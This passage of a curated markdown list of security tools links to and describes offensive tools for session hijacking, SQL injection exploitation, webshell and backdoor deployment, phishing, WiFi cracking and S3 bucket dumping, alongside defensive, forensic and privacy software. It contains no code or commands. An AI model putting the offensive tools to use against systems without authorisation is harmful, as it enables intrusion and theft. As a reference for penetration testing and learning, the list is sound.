* [FaceNiff](http://faceniff.ponury.net/): It is an Android app that allows you to sniff and intercept web session profiles over the WiFi that your mobile is connected to. It is possible to hijack sessions only when WiFi is not using EAP, but it should work over any private networks (Open/WEP/WPA-PSK/WPA2-PSK). It's kind of like Firesheep for Android. Maybe a bit easier to use (and it works on WPA2!).

---

### Hacking web
* [DirBuster](https://sourceforge.net/projects/dirbuster/): It is a multi-threaded Java application designed to brute force directory and file names on web/application servers.
* [Ghost Eye](https://github.com/BullsEye0/ghost_eye): It is an information-gathering tool written in Python 3. To run, Ghost Eye only needs a domain or IP.
* [httprecon](https://w3dt.net/tools/httprecon): It is a tool for advanced web server fingerprinting. This tool performs banner-grabbing attacks, status code enumeration, and header ordering analysis on its target web server.
* [ID Serve](https://www.grc.com/id/idserve.htm): It is a simple Internet server identification utility. The following is a list of its capabilities: HTTP server identification, non-HTTP server identification, reverse DNS lookup.
* [skipfish](https://code.google.com/archive/p/skipfish/): It is an active web application security reconnaissance tool. It prepares an interactive sitemap for the targeted site by carrying out a recursive crawl and dictionary-based probes. The resulting map is then annotated with the output from a number of active (but hopefully non-disruptive) security checks. The final report generated by the tool is meant to serve as a foundation for professional web application security assessments.

#### Footprinting
* [More tools](#website-footprinting)

##### Whois lookup
* [IP Converter](http://www.sabsoft.com)
* [Netcraft](https://www.netcraft.com/)
* [SmartWhois](https://www.tamos.com)
* [WHOIS Lookup](http://whois.domaintools.com)

##### DNS interrogation
* [DNSRecon](https://github.com/darkoperator/dnsrecon)
* [DNS Records](https://network-tools.com/dns-records/)
* [Domain Dossier](https://centralops.net/co/)
* [Toolset](https://tools.dnsstuff.com)

##### Scan ports and services running
* [Nmap](https://github.com/nmap/nmap)
* [WhatWeb](https://github.com/urbanadventurer/WhatWeb)

##### Web application reconnaissance
* telnet
* [WhatWeb](https://github.com/urbanadventurer/WhatWeb)

##### Web spidering
* [OWASP Zed Attack Proxy (ZAP)](https://owasp.org/www-project-zap/): Integrated penetration testing tool for finding vulnerabilities in web applications. It offers automated scanners as well as a set of tools that allow you to find security vulnerabilities manually.

##### Detect load balancer
* [dig](https://github.com/polarityio/dig): Network admin tool for querying DNS servers.
* [halberd](https://github.com/jmbr/halberd): Discovers HTTP load balancers. It is useful for web application security auditing and for load balancer configuration testing.
* [load balancing detector (lbd)](https://github.com/craig/ge.mine.nu/tree/master/lbd): Detects if a given domain uses DNS and/or HTTP load balancing (via the Server: and Date: headers and diffs between server answers).

##### Identify web server directories
* [Gobuster](https://github.com/OJ/gobuster): Directory/file, DNS and VHost busting tool written in Go.
* [Nmap](https://github.com/nmap/nmap)

##### Identify web application vulnerabilities
* [acunetix](https://www.acunetix.com/)
* [appscan](https://www.hcltechsw.com/products/appscan)
* [appspider](https://www.rapid7.com/products/appspider/): Web application security testing to close the gaps in your apps.
* [arachni](https://github.com/Arachni/arachni): Web application security scanner framework.
* [nikto](https://github.com/sullo/nikto): Nikto web server scanner.
* [OWASP Zed Attack Proxy (ZAP)](https://owasp.org/www-project-zap/): Integrated penetration testing tool for finding vulnerabilities in web applications. It offers automated scanners as well as a set of tools that allow you to find security vulnerabilities manually.
* [uniscan](https://github.com/poerschke/Uniscan): Uniscan web vulnerability scanner.
* [vega](https://subgraph.com/vega/): A free and open source web security scanner and web security testing platform to test the security of web applications. Vega can help you find and validate SQL injection, cross-site scripting (XSS), inadvertently disclosed sensitive information, and other vulnerabilities. It is written in Java, GUI based, and runs on Linux, OS X, and Windows.
* [Vulnerability Scanning Tools by OWASP](https://owasp.org/www-community/Vulnerability_Scanning_Tools)
* [WPScan](https://github.com/wpscanteam/wpscan): WordPress security scanner. Written for security professionals and blog maintainers to test the security of their WordPress websites.

#### Attack
* [Burp Suite](https://portswigger.net/burp): Integrated platform for performing security testing of web applications. It has various tools that work together to support the entire testing process, from the initial mapping and analysis of an application's attack surface to finding and exploiting security vulnerabilities. Contains key components such as an intercepting proxy, application-aware spider, advanced web application scanner, intruder tool, repeater tool, and sequencer tool.
* [HopLa Burp Suite Extender plugin](https://github.com/synacktiv/HopLa): Adds autocompletion support and useful payloads in Burp Suite.
* [Metasploit Framework](https://github.com/rapid7/metasploit-framework)
* [php-webshells](https://github.com/JohnTroony/php-webshells): Common PHP webshells you might need for your penetration testing assignments or CTF challenges. Do not host the file(s) on your server!
* [Weevely](https://github.com/epinna/weevely3): Used to develop a backdoor shell and upload it to a target server in order to gain remote shell access. This tool also helps in performing administrative tasks, maintaining persistence, and spreading backdoors across the target network.

##### SQL Injection
* [bbqsql](https://github.com/CiscoCXSecurity/bbqsql): SQL injection exploitation tool.
* [blind-sql-bitshifting](https://github.com/awnumar/blind-sql-bitshifting): A blind SQL injection module that uses bit-shifting to calculate characters.
* [Blisqy](https://github.com/JohnTroony/Blisqy): Exploit time-based blind SQL injection in HTTP headers (MySQL/MariaDB).
* [DSSS - Damn Small SQLi Scanner](https://github.com/stamparm/DSSS): A fully functional SQL injection vulnerability scanner (supporting GET and POST parameters) written in under 100 lines of code.
* [Havij](https://web.archive.org/web/20150228203859/http://itsecteam.com/products/havij-advanced-sql-injection/): An automated SQL injection tool that helps penetration testers find and exploit SQL injection vulnerabilities on a web page. It can take advantage of a vulnerable web application. By using this software, the user can perform back-end database fingerprinting, retrieve DBMS login names and password hashes, dump tables and columns, fetch data from the database, execute SQL statements against the server, and even access the underlying file system and execute operating system shell commands.
* [Mole](https://sourceforge.net/projects/themole/): An automatic SQL injection exploitation tool. Given only a vulnerable URL and a valid string on the site, it can detect the injection and exploit it, either by using the union technique or a boolean-query-based technique. The Mole uses a command-based interface, allowing the user to easily indicate the action they want to perform. The CLI also provides auto-completion on both commands and command arguments, so the user types as little as possible.
* [NoSQLMap](https://github.com/codingo/NoSQLMap): Automated NoSQL database enumeration and web application exploitation tool.
* [sqlmap](http://sqlmap.org/): An open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches, from database fingerprinting and fetching data from the database to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

#### Vulnerable web applications
* [Damn Vulnerable Web App (DVWA)](https://github.com/digininja/DVWA): A PHP/MySQL web application that is damn vulnerable. Its main goal is to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid both students and teachers in learning about web application security in a controlled classroom environment.

---

### Protection
* [atomic-red-team](https://github.com/redcanaryco/atomic-red-team): Small and highly portable detection tests based on MITRE's ATT&CK.
* [brave](https://brave.com/)
* [CaseFile](https://www.maltego.com/products/)
* [CODE42](https://www.code42.com/)
* [malwarebytes](https://www.malwarebytes.com/)
* [Splunk](https://www.splunk.com/)
* [Tor](https://www.torproject.org/)
* [whoogle-search](https://github.com/benbusby/whoogle-search): A self-hosted, ad-free, privacy-respecting metasearch engine.

#### Disk encryption
* [FinalCrypt](https://www.finalcrypt.org/)
* [Gilisoft Full Disk Encryption](http://www.gilisoft.com/product-full-disk-encryption.htm)
* [Rohos Disk Encryption](https://www.rohos.com/products/rohos-disk-encryption/): A program that creates hidden and protected partitions on a computer, USB flash drive or cloud storage. It protects/locks access to encrypted partitions with a hardware key replacing your password.
* [VeraCrypt](https://sourceforge.net/projects/veracrypt/)

#### E-mail
* [Egress Secure Email and File Transfer](https://www.egress.com/email-security/encryption): Secure email encryption software that delivers the highest level of security.
* [Proofpoint Email Protection](https://www.proofpoint.com/us/products/email-security-and-protection)
* [RMail E-Security](https://rmail.com/)
* [Virtru](https://www.virtru.com/): End-to-end encryption for email and files.
* [ZixMail](https://www.getzixmail.com/products/zixmail): A desktop email encryption solution that provides individuals with a high level of security in their email communications. It's an easy-to-use service that lets users encrypt and decrypt emails and attachments with a single click.

#### Firewalls
* [Comodo Firewall](https://personalfirewall.comodo.com/)
* [ManageEngine Firewall Analyzer](https://www.manageengine.com/products/firewall/)
* [pfSense](https://www.pfsense.org/)
* [Sophos XG Firewall](https://www.sophos.com/en-us/products/next-gen-firewall.aspx)
* [ZoneAlarm Free Firewall](https://www.zonealarm.com/software/free-firewall)

#### Honeypots
* [awesome-honeypots](https://github.com/paralax/awesome-honeypots): An awesome list of honeypot resources.
* [Honeyd Virtual Honeypot](http://www.honeyd.org/): A small daemon that creates virtual hosts on a network. The hosts can be configured to run arbitrary services, and their personality can be adapted so that they appear to be running certain operating systems. Honeyd enables a single host to claim multiple addresses - I have tested up to 65536 - on a LAN for network simulation. Honeyd improves cyber security by providing mechanisms for threat detection and assessment. It also deters adversaries by hiding real systems in the middle of virtual systems.
* [KFSensor](http://www.keyfocus.net/kfsensor/): Acts as a honeypot, designed to attract and detect hackers and worms by simulating vulnerable system services and trojans.

#### IDS / IPS
* [Snort](https://www.snort.org/): The foremost open source Intrusion Prevention System (IPS) in the world. Snort IPS uses a series of rules that help define malicious network activity, uses those rules to find packets that match them, and generates alerts for users.
* [wazuh](https://github.com/wazuh): Open source security platform based on OSSEC.

#### Inventory management
* [GLPI Project](https://glpi-project.org/)
* [OCS Inventory](https://ocsinventory-ng.org/?lang=en): Open Computers and Software Inventory is an asset management solution.
* [spiceworks](https://www.spiceworks.com/)

#### Passwords
* [1password](https://1password.com/): Password manager.

#### Patch
* [Patch My PC](https://patchmypc.com/home-updater): Simplify third-party patching on your PC.
* [Windows Server Update Services (WSUS)](https://docs.microsoft.com/en-us/windows-server/administration/windows-server-update-services/get-started/windows-server-update-services-wsus): Enables information technology administrators to deploy the latest Microsoft product updates.

#### Trackers
* [ClearURLs](https://chrome.google.com/webstore/detail/clearurls/lckanjgmijmafbedllaakclkaicjfmnk): This extension automatically removes tracking elements from URLs to help protect your privacy when browsing the Internet.
* [PixelBlock](https://chrome.google.com/webstore/detail/pixelblock/jmpmfcjnflbcoidlgapblgpgbilinlem): Blocks people from tracking when you open their emails.
* [Privacy Badger](https://chrome.google.com/webstore/detail/privacy-badger/pkehgijcmpdhfbdbbnkijodmdjhbjlgp): Automatically learns to block invisible trackers.
* [Ugly Email](https://chrome.google.com/webstore/detail/ugly-email/ldgiafaliifpknmgofiifianlnbgflgj): An open-source Gmail extension for identifying and blocking email trackers.

---

### Forensics
* [Autopsy](https://www.autopsy.com/): Autopsy® is the premier end-to-end open source digital forensics platform. Built by Basis Technology with the core features you expect in commercial forensic tools, Autopsy is a fast, thorough, and efficient hard drive investigation solution that evolves with your needs.
* [Volatility](https://github.com/volatilityfoundation/volatility): An advanced memory forensics framework.

---

### Social engineering
* [avatarify](https://github.com/alievk/avatarify): Avatars for Zoom, Skype and other video-conferencing apps.
* [mailtrack](https://mailtrack.io/en/): Know when your emails are opened.
* [Get Facebook account from phone number](https://www.facebook.com/login/identify?ctx=recover&lwv=100)

#### Phishing
* [Social-Engineer Toolkit (SET)](https://github.com/trustedsec/social-engineer-toolkit): An open-source penetration testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make a believable attack quickly.
* [ShellPhish](https://github.com/suljot/shellphish): Phishing tool for Instagram, Facebook, Twitter, Snapchat, GitHub.

##### Protection

###### Employee education
* [Gophish](https://getgophish.com/): Open-source phishing framework.
* [king-phisher](https://github.com/rsmusllp/king-phisher): Phishing campaign toolkit.
* [OhPhish](https://ohphish.eccouncil.org/)

###### Phishing detection
* [Netcraft](https://www.netcraft.com/)
* [PhishTank](https://www.phishtank.com/)

---

### Hacking wireless
* [aircrack-ng](https://www.aircrack-ng.org/): A complete suite of tools to assess WiFi network security.
* [kismac-ng](https://kismac-ng.org/): Free and open-source program that helps you collect essential information about surrounding WiFi networks. The KisMAC WiFi scanner app can detect SSIDs, shows you the logged-in clients, allows you to sketch WiFi maps, and more!
* [Reaver](https://github.com/t6x/reaver-wps-fork-t6x)
* [Pyrit](https://github.com/JPaulMora/Pyrit): It allows you to create massive databases of pre-computed WPA/WPA2-PSK authentication phases as a space-time trade-off. By using the computational power of multi-core CPUs and other platforms through ATI-Stream, Nvidia CUDA and OpenCL, it is currently by far the most powerful attack against one of the world's most used security protocols.
* [wepattack](https://sourceforge.net/projects/wepattack/): Active dictionary attack on WEP keys in WLAN networks.
* [wepcrackgui](https://sourceforge.net/projects/wepcrackgui/): GUI for aircrack-ng that can crack WEP and WPA networks, automatically scans for available networks, and provides fake authentication and injection support.

#### Bluetooth
* [bluediving](https://github.com/balle/bluediving): The Bluetooth penetration testing tool suite.

#### Finding WPS-enabled APs
* [Wash](https://github.com/t6x/reaver-wps-fork-t6x)

#### MAC spoofing
* ifconfig
* [macchanger](https://github.com/alobbs/macchanger)
* [Technitium MAC Address Changer](https://technitium.com/tmac/)

#### WPA3

##### Dragonblood
* [dragondrain-and-time](https://github.com/vanhoefm/dragondrain-and-time): The dragondrain tool can be used to test whether, or to what extent, an Access Point is vulnerable to denial-of-service attacks against WPA3's SAE handshake. dragontime is an experimental tool to perform timing attacks against the SAE handshake if MODP group 22, 23, or 24 is supported. Note that most WPA3 implementations by default do not enable these groups.
* [dragonforce](https://github.com/vanhoefm/dragonforce): An experimental tool which takes the information recovered from our timing or cache-based attacks and performs a password partitioning attack. This is similar to a dictionary attack.
* [dragonslayer](https://github.com/vanhoefm/dragonslayer): An experimental tool to test WPA3's SAE and EAP-pwd implementations for vulnerabilities. We also strongly recommend performing code inspections to ensure all vulnerabilities have been properly addressed.

---

### Steganography

#### Image
* [CryptaPix](https://www.briggsoft.com)
* [gifshuffle](http://www.darkside.com.au)
* [OpenStego](https://github.com/syvaidya/openstego): A steganography application that provides two functionalities: a) Data hiding: it can hide any data within an image file. b) Watermarking: watermarking image files with an invisible signature. It can be used to detect unauthorized file copying.
* [QuickStego](http://quickcrypto.com)
* [SSuite Picsel](https://www.ssuitesoft.com)

#### White space
* [snow](http://www.darkside.com.au/snow/): Used to conceal messages in ASCII text by appending whitespace to the end of lines. Because spaces and tabs are generally not visible in text viewers, the message is effectively hidden from casual observers. And if the built-in encryption is used, the message cannot be read even if it is detected.

---

### Internet of Things (IoT)

#### Information gathering
* [Shodan](https://www.shodan.io/): Search engine for Internet-connected devices.

#### Maintain access
* [Firmware Modification Kit](https://github.com/rampageX/firmware-mod-kit): This kit is a collection of scripts and utilities to extract and rebuild Linux-based firmware images.

---

### Cloud

#### Containers

##### Amazon S3

###### Enumeration
* [Bucket Finder](https://digi.ninja/projects/bucket_finder.php): A fairly simple tool to run: all it requires is a wordlist, and it will go off and check each word to see if that bucket name exists in Amazon's S3 system. For any bucket it finds, it checks whether the bucket is public, private or a redirect.
* [lazys3](https://github.com/nahamsec/lazys3): A Ruby script to brute-force AWS S3 bucket names using different permutations.
* [s3-buckets-finder](https://github.com/gwen001/s3-buckets-finder): Find AWS S3 buckets and extract data.
* [s3-inspector](https://github.com/clario-tech/s3-inspector): Tool to check AWS S3 bucket permissions.
* [s3recon](https://github.com/clarketm/s3recon): Amazon S3 bucket finder and crawler.
* [S3Scanner](https://github.com/sa7mon/S3Scanner): Scan for open AWS S3 buckets and dump the contents.

###### Exploit
* [aws_pwn](https://github.com/dagrz/aws_pwn): A collection of AWS penetration testing junk.

##### Google Storage Buckets
* [GCPBucketBrute](https://github.com/RhinoSecurityLabs/GCPBucketBrute): A script to enumerate Google Storage buckets, determine what access you have to them, and determine if they can be privilege escalated.

##### Scanners
* [clair](https://github.com/quay/clair): Vulnerability static analysis for containers.
* [dagda](https://github.com/eliasgranderubio/dagda): A tool to perform static analysis of known vulnerabilities, trojans, viruses, malware and other malicious threats in Docker images/containers and to monitor the Docker daemon and running Docker containers for detecting anomalous activities.
* [trivy](https://github.com/aquasecurity/trivy): A simple and comprehensive vulnerability scanner for container images, Git repositories and filesystems. Suitable for CI.

#### Salesforce

##### Scanners
* [CxVSCode](https://marketplace.visualstudio.com/items?itemName=checkmarx.cxvscode): An IDE extension that brings the Checkmarx AppSec unique capabilities closer to the developer.

##### JavaScript
* [RetireJS](https://retirejs.github.io/retire.js/): There is a plethora of JavaScript libraries for use on the web and in node.js apps out there. This greatly simplifies development, but we need to stay up to date on security fixes. "Using Components with Known Vulnerabilities" is now a part of the OWASP Top 10, and insecure libraries can pose a huge risk for your webapp. The goal of Retire.js is to help you detect use of versions with known vulnerabilities.

[<- Back to index](README.md)

---

## License

© 2023 [javierizquierdovera.com](https://javierizquierdovera.com)

Licensed under the [Apache License, Version 2.0](https://www.apache.org/licenses/LICENSE-2.0) ([`LICENSE-APACHE`](LICENSE-APACHE)) or the [MIT license](https://opensource.org/licenses/MIT) ([`LICENSE-MIT`](LICENSE-MIT)), at your option.

`SPDX-License-Identifier: (Apache-2.0 OR MIT)`